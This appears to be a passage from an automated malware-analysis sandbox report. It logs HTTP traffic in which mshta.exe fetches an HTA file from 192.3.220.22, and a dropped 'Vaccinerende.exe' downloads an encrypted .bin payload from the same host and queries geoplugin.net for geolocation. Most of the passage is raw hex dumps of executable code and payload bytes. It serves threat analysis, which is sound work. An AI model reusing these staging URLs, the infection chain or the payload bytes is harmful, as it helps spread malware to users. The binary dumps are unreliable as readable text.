                                                                            Sep 30, 2024 09:53:34.512480974 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: U\}t+}FEuHBHPuuu@BSV5BEWPu @eEEPu$@}e\@FRVVU+M
                                                                            Sep 30, 2024 09:53:34.512492895 CEST1236INData Raw: 8b f0 89 4d f4 8d 4d d8 c1 e6 0b 89 0d a8 cd 40 00 8d 4a fe 03 f7 83 f9 43 89 5d fc 0f 87 35 16 00 00 ff 24 8d d1 2a 40 00 53 50 e8 18 3e 00 00 e9 54 0e 00 00 ff 05 cc 91 42 00 39 5d f8 0f 84 45 0e 00 00 53 ff 15 94 82 40 00 e9 39 0e 00 00 50 e8
                                                                            Data Ascii: MM@JC]5$*@SP>TB9]ES@9PHSPSP=S8YU3@Px@ud@9]u&BjBYUMBBB}E4B3;#MD
                                                                            Sep 30, 2024 09:53:34.512505054 CEST1236INData Raw: e9 89 11 00 00 6a f0 e8 ef 12 00 00 ff 75 dc 50 e8 09 40 00 00 e9 69 11 00 00 6a 01 e8 da 12 00 00 50 e8 ff 48 00 00 e9 24 0c 00 00 6a 02 e8 a6 12 00 00 6a 03 89 45 b0 89 55 b4 e8 99 12 00 00 59 8b f8 8b 45 b0 59 6a 01 89 7d cc 89 55 d0 89 45 08
                                                                            Data Ascii: juP@ijPH$jjEUYEYj}UEPEH9]fuE9]M;}<;;~ExPVwH9]}VHEy]E=fFj 1j1(9]PVu@uzE@
                                                                            Sep 30, 2024 09:53:34.512516975 CEST1236INData Raw: 01 88 0d c4 cd 40 00 8a c8 80 e1 02 24 04 68 cc cd 40 00 88 0d c5 cd 40 00 a2 c6 cd 40 00 e8 3b 44 00 00 68 b0 cd 40 00 ff 15 54 80 40 00 e9 49 07 00 00 53 e8 cc 0d 00 00 6a 01 8b f0 89 55 b4 e8 c0 0d 00 00 39 5d e4 59 59 89 55 b4 50 56 75 0b ff
                                                                            Data Ascii: @$h@@@;Dh@T@ISjU9]YYUPVuh@S@HSj1j"jjEEEEEEff]#EffE`C#E|P9E@uGuGS1
                                                                            Sep 30, 2024 09:53:34.512526989 CEST1120INData Raw: e8 53 e8 83 3f 00 00 50 e8 bd 35 00 00 b8 ff ff ff 7f e9 cf 07 00 00 ff 05 b4 a2 42 00 e9 b9 07 00 00 33 f6 33 ff 3b c3 74 08 53 e8 23 09 00 00 8b f0 39 5d dc 74 09 6a 11 e8 15 09 00 00 8b f8 39 5d e8 74 09 6a 22 e8 07 09 00 00 8b d8 6a cd e8 fe
                                                                            Data Ascii: S?P5B33;tS#9]tj9]tj"jPSWVd@l@jEjjEPhEVPuW`@f>9]uu+j;j3PV @V$@j"uMQPV&;
                                                                            Sep 30, 2024 09:53:34.512540102 CEST1236INData Raw: 00 00 00 8d 45 bc 6a 02 50 ff 75 f0 e8 6c 36 00 00 85 c0 74 7d 8b 45 bc 39 5d e4 75 31 66 83 7d d0 0d 74 3b 66 83 7d d0 0a 74 34 8b 4d f4 8b 55 f8 ff 45 f8 66 3b c3 66 89 04 51 89 45 d0 74 52 8b 45 f8 3b 45 c4 0f 8c 03 ff ff ff eb 44 0f b7 c0 50
                                                                            Data Ascii: EjPul6t}E9]u1f}t;f}t4MUEf;fQEtRE;EDPu9%f9Etf=tf=uMUEfQEjSPuD@ME;fAf9jYUuSPV9PD@9]FV9;PL@u
                                                                            Sep 30, 2024 09:53:34.512552977 CEST1236INData Raw: 04 8b 0d a8 cd 40 00 56 ff 34 81 6a 00 e8 44 36 00 00 8b f0 56 e8 7a 35 00 00 0f b7 16 5e c3 56 8b 74 24 08 85 f6 57 8b c6 7d 02 f7 d8 8b 15 a8 cd 40 00 8b c8 83 e1 0f c1 f8 04 ff 34 8a c1 e0 0b 05 a8 a5 40 00 50 e8 0a 36 00 00 85 f6 8b f8 7d 06
                                                                            Data Ascii: @V4jD6Vz5^Vt$W}@4@P6}Wp8_^UEPE Pj"P@pP4#E]D$|BUEPE PuuP3#E]UM EPu
                                                                            Sep 30, 2024 09:53:34.512615919 CEST1236INData Raw: e8 08 2c 00 00 33 c0 5f 5e 5b c9 c2 04 00 55 8b ec 81 ec 90 00 00 00 53 56 8b 75 14 57 8b 7d 10 89 75 f8 85 ff 75 07 c7 45 f8 00 80 00 00 83 65 fc 00 8b df 85 ff 75 05 bb a0 0e 41 00 8b 45 08 85 c0 7c 0e 8b 0d 78 a2 42 00 03 c8 51 e8 b7 01 00 00
                                                                            Data Ascii: ,3_^[USVuW}uuEeuAE|xBQEjPEE$|@@E6eEET@9u}u@VWE)u=(@5,@E@0@4@5E50@+|
                                                                            Sep 30, 2024 09:53:34.512626886 CEST1236INData Raw: 8b 35 70 80 40 00 57 68 90 a2 40 00 ff d6 57 68 88 a2 40 00 ff d6 e8 31 fd ff ff 85 c0 0f 84 cb 00 00 00 68 00 70 43 00 ff 15 40 81 40 00 ff 74 24 1c e8 ca f8 ff ff 3b c3 89 44 24 10 0f 85 ab 00 00 00 39 1d 20 a2 42 00 0f 84 8f 00 00 00 53 55 e8
                                                                            Data Ascii: 5p@Wh@Wh@1hpC@@t$;D$9 BSU4%;rL@@|@~@3;uV;tNN;s3;D$@rffV%t*VhXC+Vh`C+\$BD$
                                                                            Sep 30, 2024 09:53:34.517575026 CEST1236INData Raw: 50 55 e8 b1 27 00 00 55 e8 84 21 00 00 85 c0 75 0c ff b6 18 01 00 00 55 e8 bd 27 00 00 68 40 80 00 00 57 57 6a 01 6a 67 ff 35 00 a2 42 00 ff 15 60 82 40 00 a3 e8 91 42 00 83 7e 50 ff bb a0 91 42 00 74 7f 8b 0d 00 a2 42 00 be 80 a3 40 00 53 c7 05
                                                                            Data Ascii: PU'U!uU'h@WWjjg5B`@B~PBtB@SB@BB5B4@fD$WPWj08@W5BD$$+D$WWPD$,+D$$Pt$,t$,hWVh<@6BWtjX9=Bj56Bh@


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.2249172192.3.220.22801852C:\Windows\System32\mshta.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:53:49.574035883 CEST466OUTGET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            Connection: Keep-Alive
                                                                            Host: 192.3.220.22
                                                                            If-None-Match: "1ceb2-62345be2e2e61"
                                                                            Sep 30, 2024 09:53:50.060250044 CEST275INHTTP/1.1 304 Not Modified
                                                                            Date: Mon, 30 Sep 2024 07:53:49 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 17:51:50 GMT
                                                                            ETag: "1ceb2-62345be2e2e61"
                                                                            Accept-Ranges: bytes
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.2249173192.3.220.2280924C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:56:14.202555895 CEST179OUTGET /hFXELFSwRHRwqbE214.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 192.3.220.22
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:56:14.719575882 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:56:13 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
                                                                            ETag: "78c40-62349e0caa82a"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 494656
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: 4e a0 96 ff 79 3e 6e 05 34 71 21 6e e1 21 b3 d3 89 05 24 c0 68 72 32 b6 27 8a fa 2f a4 d2 30 70 b0 60 2e b2 48 53 fa 14 95 ef c8 19 07 86 19 d0 48 ef b0 c8 59 6a d5 c0 8b 6c 17 6a 57 54 63 f5 f0 c3 db 7c d2 0e db 7c d1 78 ee 47 7e a8 1f b6 d1 ae 8a d8 da bb 54 e2 ff 93 b8 ad 09 6c 87 4b a2 ed f4 5d a0 73 88 ad ae 42 80 39 24 83 72 2e 43 b0 ae 05 a8 f0 9b 12 3d 08 9b 96 8c 2d 42 27 6e c4 a5 e1 c8 12 d8 1f 30 6b 99 d6 6e d4 15 a5 92 d0 2a 76 f4 45 77 84 ef 33 2a f1 7d e7 f3 ed f8 36 f6 79 a7 25 3a 90 ff b8 f5 64 38 94 3a 3f fe ee a4 50 8c c5 d8 d3 49 21 69 83 d0 70 86 ff db 86 c5 4c d9 bb 26 3d ef 54 f3 c6 21 b3 26 60 be 03 f4 3a 08 7c 6b 8a dc 89 14 ac 86 11 35 44 93 fb 9e a6 ca b5 94 d6 be 8a 1b a2 75 2a 49 15 2f 07 e0 b9 53 a8 66 19 37 2b ad e8 42 c5 1f a9 9b 58 f4 e3 ea 38 d9 f3 17 5c 86 f4 d7 4e f4 fc 5f 6b 38 be 5d af 09 f6 37 53 44 25 2a ab 2b f4 4c b8 12 af 4c 49 e3 78 50 99 a0 c6 03 ca ee 3d 36 c3 09 41 3c ad 25 00 3e d4 f4 cb 4d 4c aa d7 de 79 35 75 e7 00 e0 5b 89 7d ed cf 20 dc c1 36 a9 a4 [TRUNCATED]
                                                                            Data Ascii: Ny>n4q!n!$hr2'/0p`.HSHYjljWTc||xG~TlK]sB9$r.C=-B'n0kn*vEw3*}6y%:d8:?PI!ipL&=T!&`:|k5Du*I/Sf7+BX8\N_k8]7SD%*+LLIxP=6A<%>MLy5u[} 6_:7dr`0qC_|_I^<D(o%dj*qJx)<,VD$9yD+<}4Ht:Qo'}u-p"=5Z}gBc?O%G^2>kiJTsToX5AJ3R0]uNL't~ahZ,z{3B*YK!TtbG4SoR>+hy]>r`?t#H%h>=+&0l.LbR13ST(u2`hN5^M%"UPA7FgMLE^NlJBQL{\(l*~hN$R-EgHg]/11ONoi|RqvAGJnDb$.1Z!v.%UBj{l0'j*v'S`}F;&RT-FfkR8^9UJs>HD%C#d
                                                                            Sep 30, 2024 09:56:14.719618082 CEST1236INData Raw: 7a c6 25 bd 9b a9 7e 31 df 9f 22 d3 d7 90 9b b7 fe 66 df 4d 36 a9 cc 83 9f d6 42 22 c3 2b cf 1d d8 62 32 05 a8 f1 7e 6d 61 82 bf 00 42 c1 5b 0f 86 af 0a d7 a5 af d3 7a ce f2 f3 24 8b 14 2c 0c 83 88 22 98 45 31 87 b8 7b 28 9c 9b 90 25 84 58 e5 ed
                                                                            Data Ascii: z%~1"fM6B"+b2~maB[z$,"E1{(%X[n~vsgsK@<$f%.I9p?@OyL`]Vb:/4]BIf<I0qji"/c=E:P69;'&Jw]!+$
                                                                            Sep 30, 2024 09:56:14.719635963 CEST1236INData Raw: 1e 20 2f a7 19 c4 4c 95 2a 49 df 97 4e 84 18 79 84 42 08 00 f5 ab c4 1b 82 c0 bf 60 d7 19 02 15 86 8d c5 e4 99 88 93 ec 4d 1e eb 6c 5f 90 24 2a b8 8b 2d ff 8e 11 16 e8 a5 ad 73 9d 64 b8 11 a4 37 2f 88 51 68 dd d7 2c 40 f0 c8 cc b2 8c 14 bc 4e 87
                                                                            Data Ascii: /L*INyB`Ml_$*-sd7/Qh,@N%q`=lv)H-DJgnZ(!,.,YBzTg0KH5z+i}33`cy;O+R..8QJjA=H!>CVyMV~!SW{2eOSHob
                                                                            Sep 30, 2024 09:56:14.719649076 CEST672INData Raw: 1f 1e b8 27 f9 cf b4 87 79 3a b3 e5 44 82 ed 53 19 54 07 74 86 6d 5c 76 88 93 9c 5d f3 90 f7 4e c4 91 1a 9c 47 3b fb 64 53 11 d8 9a 38 c3 8e 94 40 d4 4a a1 27 c9 fa 7f 6b 1d 57 ad 6a b5 ec 6a 50 49 26 d6 e8 f4 e6 c0 57 2a 82 20 9b 9b 26 1d 5a d6
                                                                            Data Ascii: 'y:DSTtm\v]NG;dS8@J'kWjjPI&W* &ZuK!Tz8YTvganyJ_fP{$8p%=+H,.L2Ebc'(r<!y2/\ON5 "hPd]{ /%yB\j((Wln
                                                                            Sep 30, 2024 09:56:14.719660044 CEST1236INData Raw: bc ba 25 1a d6 ec 41 b4 09 f7 a6 8e 75 e8 27 38 be 35 ed d3 ee 3d f7 ed c4 17 64 83 a5 11 cf a1 40 95 60 a1 39 ee 73 08 3a da 13 f6 3e d0 50 48 d6 df ec 6a 5a 1f 72 b3 35 5e 2c 29 e0 d3 89 01 b0 74 20 90 77 a0 4c 2d 72 8f 9c 76 22 d9 09 25 dc 76
                                                                            Data Ascii: %Au'85=d@`9s:>PHjZr5^,)t wL-rv"%vh uC?&f6^?3g.#7H2O P2_5gRM)UDX2QJF);3VxJ_G05gSzG{yP_xW>
                                                                            Sep 30, 2024 09:56:14.719666004 CEST1236INData Raw: 79 3d cc a3 17 2c 0c 7c fc 06 90 ce ff 6f 84 7f 28 9c 10 56 7b 46 5c e5 bb 83 aa 86 27 f7 df 76 19 67 74 c0 72 5a 45 ee b2 73 ad f2 75 e8 47 cb 61 f8 71 18 f6 3b df fc 24 66 02 e3 70 8b 86 d3 cd b2 81 17 b7 64 0d 56 25 91 5a 91 57 ae 2f e5 20 b2
                                                                            Data Ascii: y=,|o(V{F\'vgtrZEsuGaq;$fpdV%ZW/ }o|c QY>~f\'xQ:.vKu=)C5T<RB{W[h_Un=8,jaM~+B.5g\4 Y;9}
                                                                            Sep 30, 2024 09:56:14.719671011 CEST448INData Raw: b4 94 e3 6f ef a0 6c 5e 2f 31 2e 44 8a 5c 89 1c 95 20 f6 de 23 95 72 96 e4 6f 9f 87 c0 09 a7 85 75 eb 7a 9e d8 43 1a 0e a9 b8 14 e5 57 38 71 1e 98 ef 89 14 e6 6e 62 65 62 bf 5a 1f 15 e1 02 8b a5 49 2d 06 aa 72 ee 12 19 d0 0d 53 a4 2b f5 22 90 46
                                                                            Data Ascii: ol^/1.D\ #rouzCW8qnbebZI-rS+"Fw%s>yl$S?hJ;+L J:T&m?\dF%R7|Y61Bfo"\^OG#"$4+aJ+!oPE0|w!a-v+m`o\d
                                                                            Sep 30, 2024 09:56:14.719676018 CEST1236INData Raw: 7b 0e 59 9a 34 fe d6 68 a6 5d a6 14 6b 62 30 46 d5 3e 51 a9 48 2a 86 70 66 e8 7c b5 d0 14 01 d9 c4 0b be 7e 21 8b 0b 65 cb 1d df 45 d8 42 c3 83 9a e1 5e 75 7b 10 34 e3 c6 fb 94 81 96 c1 12 f6 99 74 67 82 1c d7 30 5f f5 bc 85 d7 8d 05 14 0b a5 37
                                                                            Data Ascii: {Y4h]kb0F>QH*pf|~!eEB^u{4tg0_7^Sl9sp;l}kl:Gj#^0o$#={w`z4QdH|UTxZPeayD\%?i+dpy0{:`Ez-Jj:>oD%?FG
                                                                            Sep 30, 2024 09:56:14.719687939 CEST1236INData Raw: ad ea b1 2c f3 56 8a 29 16 82 a7 07 6f 3c 90 d2 65 b5 cc 8e ba d3 d1 b6 e4 d3 f1 39 98 81 e3 66 0d 9a 1e 6e 04 b5 34 81 32 c6 dd 39 7d 8e b9 85 61 3a c4 3e 70 85 1d 6b d1 23 ed e0 88 44 34 d8 ad 5f 9a 29 84 da e4 ae 71 a9 e8 d3 73 81 4d 91 1f 7a
                                                                            Data Ascii: ,V)o<e9fn429}a:>pk#D4_)qsMzq^YpDV*^w+#`.{C;|[{0`PGrRio<RAe86inkwqKrz3XX[9wqrjN,]e$NS*0W5x
                                                                            Sep 30, 2024 09:56:14.719702959 CEST1236INData Raw: e5 f1 a7 82 eb 1b 91 5b 8a f2 e0 e2 62 24 07 a8 6f d0 99 b8 5a f7 ae 21 76 af a5 c5 e7 51 42 ae 99 1c 0e ec ca d8 6a f0 db fc ae bd 30 71 32 df 24 fc 07 e4 82 66 ea 0f d5 26 11 53 ee 43 36 e7 fe d8 90 b4 fe 82 2b f9 16 2e 9b 03 ab 19 62 83 8e 33
                                                                            Data Ascii: [b$oZ!vQBj0q2$f&SC6+.b3R2u4"Q26%!5n7x,(vQ>f<%tXzt@/$?sY,yot%I+xXi/E&*(&^%.sy2`
                                                                            Sep 30, 2024 09:56:14.724667072 CEST1236INData Raw: e5 9e 20 92 5b 3f 8d 18 d9 15 10 10 65 ec 53 f2 7e ab b4 02 29 80 0d 0f 38 25 b7 8f 7b 62 eb 2c 32 2f 8a ff f2 af 11 89 34 ab 13 3b 91 ec a1 bb 3c 49 0e 4c 30 3f 2f e0 4b b6 2b 47 bc e6 6b e6 08 b8 4b 03 30 1b 2c 4a 10 d4 c9 17 9a 06 c1 32 d3 9d
                                                                            Data Ascii: [?eS~)8%{b,2/4;<IL0?/K+GkK0,J2ClYkE%[Bo]p6HJipjSVfA+c^=P.\xi?&o2+TC2[da+9[N*Y0=`~:m"'


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.2249176178.237.33.5080924C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:56:20.041296005 CEST71OUTGET /json.gp HTTP/1.1
                                                                            Host: geoplugin.net
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:56:20.741689920 CEST1170INHTTP/1.1 200 OK
                                                                            date: Mon, 30 Sep 2024 07:56:20 GMT
                                                                            server: Apache
                                                                            content-length: 962
                                                                            content-type: application/json; charset=utf-8
                                                                            cache-control: public, max-age=300
                                                                            access-control-allow-origin: *
                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                            Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.2249177192.3.220.22803116C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Sep 30, 2024 09:57:00.472546101 CEST179OUTGET /hFXELFSwRHRwqbE214.bin HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                            Host: 192.3.220.22
                                                                            Cache-Control: no-cache
                                                                            Sep 30, 2024 09:57:00.946851969 CEST1236INHTTP/1.1 200 OK
                                                                            Date: Mon, 30 Sep 2024 07:57:00 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Sun, 29 Sep 2024 22:47:51 GMT
                                                                            ETag: "78c40-62349e0caa82a"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 494656
                                                                            Content-Type: application/octet-stream
                                                                            Data Raw: 4e a0 96 ff 79 3e 6e 05 34 71 21 6e e1 21 b3 d3 89 05 24 c0 68 72 32 b6 27 8a fa 2f a4 d2 30 70 b0 60 2e b2 48 53 fa 14 95 ef c8 19 07 86 19 d0 48 ef b0 c8 59 6a d5 c0 8b 6c 17 6a 57 54 63 f5 f0 c3 db 7c d2 0e db 7c d1 78 ee 47 7e a8 1f b6 d1 ae 8a d8 da bb 54 e2 ff 93 b8 ad 09 6c 87 4b a2 ed f4 5d a0 73 88 ad ae 42 80 39 24 83 72 2e 43 b0 ae 05 a8 f0 9b 12 3d 08 9b 96 8c 2d 42 27 6e c4 a5 e1 c8 12 d8 1f 30 6b 99 d6 6e d4 15 a5 92 d0 2a 76 f4 45 77 84 ef 33 2a f1 7d e7 f3 ed f8 36 f6 79 a7 25 3a 90 ff b8 f5 64 38 94 3a 3f fe ee a4 50 8c c5 d8 d3 49 21 69 83 d0 70 86 ff db 86 c5 4c d9 bb 26 3d ef 54 f3 c6 21 b3 26 60 be 03 f4 3a 08 7c 6b 8a dc 89 14 ac 86 11 35 44 93 fb 9e a6 ca b5 94 d6 be 8a 1b a2 75 2a 49 15 2f 07 e0 b9 53 a8 66 19 37 2b ad e8 42 c5 1f a9 9b 58 f4 e3 ea 38 d9 f3 17 5c 86 f4 d7 4e f4 fc 5f 6b 38 be 5d af 09 f6 37 53 44 25 2a ab 2b f4 4c b8 12 af 4c 49 e3 78 50 99 a0 c6 03 ca ee 3d 36 c3 09 41 3c ad 25 00 3e d4 f4 cb 4d 4c aa d7 de 79 35 75 e7 00 e0 5b 89 7d ed cf 20 dc c1 36 a9 a4 [TRUNCATED]
                                                                            Data Ascii: Ny>n4q!n!$hr2'/0p`.HSHYjljWTc||xG~TlK]sB9$r.C=-B'n0kn*vEw3*}6y%:d8:?PI!ipL&=T!&`:|k5Du*I/Sf7+BX8\N_k8]7SD%*+LLIxP=6A<%>MLy5u[} 6_:7dr`0qC_|_I^<D(o%dj*qJx)<,VD$9yD+<}4Ht:Qo'}u-p"=5Z}gBc?O%G^2>kiJTsToX5AJ3R0]uNL't~ahZ,z{3B*YK!TtbG4SoR>+hy]>r`?t#H%h>=+&0l.LbR13ST(u2`hN5^M%"UPA7FgMLE^NlJBQL{\(l*~hN$R-EgHg]/11ONoi|RqvAGJnDb$.1Z!v.%UBj{l0'j*v'S`}F;&RT-FfkR8^9UJs>HD%C#d
                                                                            Sep 30, 2024 09:57:00.946877003 CEST1236INData Raw: 7a c6 25 bd 9b a9 7e 31 df 9f 22 d3 d7 90 9b b7 fe 66 df 4d 36 a9 cc 83 9f d6 42 22 c3 2b cf 1d d8 62 32 05 a8 f1 7e 6d 61 82 bf 00 42 c1 5b 0f 86 af 0a d7 a5 af d3 7a ce f2 f3 24 8b 14 2c 0c 83 88 22 98 45 31 87 b8 7b 28 9c 9b 90 25 84 58 e5 ed
                                                                            Data Ascii: z%~1"fM6B"+b2~maB[z$,"E1{(%X[n~vsgsK@<$f%.I9p?@OyL`]Vb:/4]BIf<I0qji"/c=E:P69;'&Jw]!+$
                                                                            Sep 30, 2024 09:57:00.946892023 CEST1236INData Raw: 1e 20 2f a7 19 c4 4c 95 2a 49 df 97 4e 84 18 79 84 42 08 00 f5 ab c4 1b 82 c0 bf 60 d7 19 02 15 86 8d c5 e4 99 88 93 ec 4d 1e eb 6c 5f 90 24 2a b8 8b 2d ff 8e 11 16 e8 a5 ad 73 9d 64 b8 11 a4 37 2f 88 51 68 dd d7 2c 40 f0 c8 cc b2 8c 14 bc 4e 87
                                                                            Data Ascii: /L*INyB`Ml_$*-sd7/Qh,@N%q`=lv)H-DJgnZ(!,.,YBzTg0KH5z+i}33`cy;O+R..8QJjA=H!>CVyMV~!SW{2eOSHob
                                                                            Sep 30, 2024 09:57:00.946908951 CEST1236INData Raw: 1f 1e b8 27 f9 cf b4 87 79 3a b3 e5 44 82 ed 53 19 54 07 74 86 6d 5c 76 88 93 9c 5d f3 90 f7 4e c4 91 1a 9c 47 3b fb 64 53 11 d8 9a 38 c3 8e 94 40 d4 4a a1 27 c9 fa 7f 6b 1d 57 ad 6a b5 ec 6a 50 49 26 d6 e8 f4 e6 c0 57 2a 82 20 9b 9b 26 1d 5a d6
                                                                            Data Ascii: 'y:DSTtm\v]NG;dS8@J'kWjjPI&W* &ZuK!Tz8YTvganyJ_fP{$8p%=+H,.L2Ebc'(r<!y2/\ON5 "hPd]{ /%yB\j((Wln
                                                                            Sep 30, 2024 09:57:00.946919918 CEST1236INData Raw: 83 34 c5 77 2b 9d d4 43 bb 89 ec cf 36 c3 10 da be 7c 9b 34 2b eb 7b 8d e2 2c 05 5a 16 87 d0 57 13 dc 28 6e 6b d3 68 98 02 38 25 38 02 57 3e 40 6d af 30 0e fc ff c6 d2 0d 62 f4 f7 4b 52 8b 93 dd 87 0a a0 1c 42 b6 7e 09 6a 08 19 33 e7 19 c6 55 ff
                                                                            Data Ascii: 4w+C6|4+{,ZW(nkh8%8W>@m0bKRB~j3UX9yTtu(}r|K[&(?xioz/Bp{?"0X}Oaw%\D*4<$BbToCa~BeGiR0E.iLs
                                                                            Sep 30, 2024 09:57:00.946930885 CEST1236INData Raw: 46 03 f4 81 c9 6e a3 14 f6 8e 0e 81 5c f4 a7 62 7d 73 9d 5c f4 15 53 4f fe 54 9e 8b c9 78 93 e2 53 b7 91 90 dd f6 cc d5 d9 e6 65 4d 8f 8f 2e 44 fb d7 ab f6 90 79 a7 0f bc 58 1e ae 70 81 f8 f4 1e 42 d5 58 8a bb 90 43 0b df 84 f9 3a 33 0f e3 3a e4
                                                                            Data Ascii: Fn\b}s\SOTxSeM.DyXpBXC:3:1G`8O;{N!z'p\|MTGnvA[!0/Q]"v;k!J <`6s8uYBl1#JAR:C7W[W:z*o}s6lsH,,/QVe,
                                                                            Sep 30, 2024 09:57:00.946942091 CEST1236INData Raw: f8 3a fe ee 47 f9 9d 16 b4 f0 6a b1 09 23 81 5e 30 b7 17 82 6f d2 00 24 ea 9e 23 da de ab 3d 7b b8 05 88 b7 77 a0 f1 60 eb 0d b4 7a 34 f6 51 64 48 ab 7c 1b a2 55 8f a2 54 12 78 18 bf bf 5a 50 e0 65 08 61 a9 1a ec 79 db cb b1 44 5c 9d ec 25 3f 69
                                                                            Data Ascii: :Gj#^0o$#={w`z4QdH|UTxZPeayD\%?i+dpy0{:`Ez-Jj:>oD%?FGfG%w=^pTu'1&Kq|m9r.C|DdiYJ-'4YZK2.v`qSBxNJS&.d|-;k`
                                                                            Sep 30, 2024 09:57:00.946953058 CEST1236INData Raw: e7 7b cb c8 43 df d3 3b 7c 5b f2 7b 30 1a 9f 05 60 b2 50 02 df fd f2 47 72 52 02 69 6f 3c 52 86 41 a5 fb 65 b3 38 36 69 09 ed ea 6e 6b 15 86 d7 77 e0 71 89 ad 7f 4b 87 fb c2 fd f3 c4 72 9d b3 ec 8e 7a 33 c3 58 58 a7 b5 d5 5b 12 39 ef c4 77 dd 71
                                                                            Data Ascii: {C;|[{0`PGrRio<RAe86inkwqKrz3XX[9wqrjN,]e$NS*0W5xUrW{6JG&J$5-.7M qG(ywF`KK|gr4LVOg&wL9:M+ji$!wg
                                                                            Sep 30, 2024 09:57:00.946963072 CEST1224INData Raw: f5 c0 37 78 d2 2c 28 1b e7 93 ee ed c7 76 e9 de ed 08 51 3e 66 d4 3c d4 f6 25 ac 74 58 04 ff 7a b0 85 10 74 40 ff c6 01 2f 07 d5 24 c4 3f 73 59 2c 85 91 ac a8 e6 8f 14 79 87 6f d9 74 15 00 25 0c 49 2b a5 d1 8b 78 c4 85 58 e5 69 c8 2f 45 f3 b3 d7
                                                                            Data Ascii: 7x,(vQ>f<%tXzt@/$?sY,yot%I+xXi/E&*(&^%.sy2`t/#66qJ2k+o/^drjNN>m^DS}Dk"YylF3T@/wMrRgR
